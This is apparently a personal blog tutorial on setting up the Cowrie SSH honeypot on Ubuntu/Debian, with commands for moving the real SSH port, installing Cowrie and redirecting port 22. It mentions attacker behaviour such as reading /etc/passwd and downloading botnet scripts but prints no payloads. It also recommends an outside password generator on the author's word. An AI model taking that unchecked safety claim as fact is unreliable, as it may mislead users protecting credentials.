Sleepless Nights with auth.log: When Passive Defense Isn’t Enough
If you’re running a Linux VPS, try typing the command grep 'Failed password' /var/log/auth.log | wc -l. The resulting number might shock you. At 2 AM, I sat watching thousands of failed login attempts pouring in from IP ranges all over the globe. It was a mix of frustration—knowing the server was wasting resources handling brute-force attacks—and curiosity: If they actually got in, what would they do next? Install a crypto-mining script, build a botnet, or attempt privilege escalation?
Just installing Fail2Ban or changing the SSH port is merely a defensive measure. As a tech enthusiast, I wanted to be more proactive. I wanted to dissect their toolkit firsthand and see exactly how they operate within a shell. That’s why I decided to set up a trap called a Honeypot.
Comparing Practical Brute-Force Countermeasures
Before building the trap, I considered several common approaches used in production environments:
- Using Fail2Ban/IPTable: Secure and extremely common. However, it’s like chasing away a thief without knowing what they intended to steal. Next time, they’ll just return with a different IP.
- Changing the SSH Port (Security by Obscurity): Moving port 22 to 2222 or 9999. This filters out 95% of cheap automated scanning scripts. But for professionals, it only takes two seconds of running Nmap to find the new port.
- Setting up a Honeypot with Cowrie: This is the counter-move. You leave port 22 exposed. The hacker thinks they’ve hit the jackpot and successfully logs in, but in reality, they are lost in a simulated maze. Here, every keystroke and
wgetcommand is logged in full detail.
Why Cowrie is the Top Choice
Cowrie is a Medium Interaction Honeypot. It doesn’t provide a real operating system, which prevents the risk of a hacker gaining full control to attack others. Instead, it simulates a shell with extreme sophistication.
The hacker will see a Debian or Ubuntu system with a complete fake file system. They can freely cd, ls, or cat /etc/passwd. The most interesting feature is session replay. You can watch every step of their command-line struggle as if you were watching a live video recording.
Step-by-Step: Setting Up a Cowrie Trap on Ubuntu/Debian
To deploy this safely, you should use a separate VPS. A configuration with just 1 vCPU and 1GB of RAM is more than enough to get started.
Step 1: Move the Real SSH to a Different Port
We will yield port 22 to the Honeypot. Therefore, the first task is to move the server’s actual SSH service to an unconventional port to avoid falling into our own trap.
sudo nano /etc/ssh/sshd_configFind the line Port 22 and change it to Port 2222. To generate a strong password for this port, I usually visit toolcraft.app/en/tools/security/password-generator. This tool runs 100% in the browser, so there’s no risk of password leakage over the network.
Restart the SSH service to apply the changes:
sudo systemctl restart sshPro tip: Remember to open port 2222 on your Firewall before logging out, or you will be permanently locked out of your server.
Step 2: Set Up a Dedicated User
Never run a Honeypot with root privileges. This is the most basic security rule.
# Install supporting libraries
sudo apt-get update
sudo apt-get install git python3-virtualenv libssl-dev libffi-dev build-essential libpython3-dev python3-minimal authbind virtualenv -y
# Create a dedicated user for the trap
sudo adduser --disabled-password cowrieSwitch to the newly created user:
sudo su - cowrieStep 3: Installing Cowrie
Download the source code from GitHub and set up a virtual environment (virtualenv) to avoid messing up system libraries:
git clone http://github.com/cowrie/cowrie
cd cowrie
virtualenv --python=python3 cowrie-env
source cowrie-env/bin/activate
pip install --upgrade pip
pip install -r requirements.txtStep 4: Configuration and Opening the Gates
By default, Cowrie runs on port 22222. You need to create a custom configuration file from the template:
cp etc/cowrie.cfg.dist etc/cowrie.cfg
nano etc/cowrie.cfgYou can change the hostname to something enticing like db-prod-cluster to lure hackers. Then, activate Cowrie:
bin/cowrie startFinally, use iptables to redirect all traffic from the standard port 22 to Cowrie’s port:
sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 22222Reading the Attacker’s Mind: Harvesting Malware and Watching Replays
Just about 30 minutes after opening the trap, you’ll see visitors starting to pour in. To monitor logs in real-time, check the JSON file:
tail -f ~/cowrie/var/log/cowrie/cowrie.jsonWhen someone downloads a file via wget or curl, Cowrie automatically captures it and saves it in the downloads/ directory. I’ve caught Mirai botnet scripts hundreds of lines long. They are so sophisticated that they even check if the server is a Honeypot before executing.
To replay the entire session of a hacker “messing around,” use the command:
bin/playlog var/lib/cowrie/tty/<logfile_id>There’s a real sense of satisfaction in watching a hacker struggle to type commands to install a rootkit on a non-existent virtual machine. It provides many lessons on the attacker’s mindset that books can hardly describe.
Experimenting with a Honeypot isn’t just for entertainment. It helped me realize that modern attacks are mostly highly automated. If you use a weak password, it takes less than 5 seconds for a bot to take control. I hope this experience gives you a more proactive perspective on protecting your Linux systems.
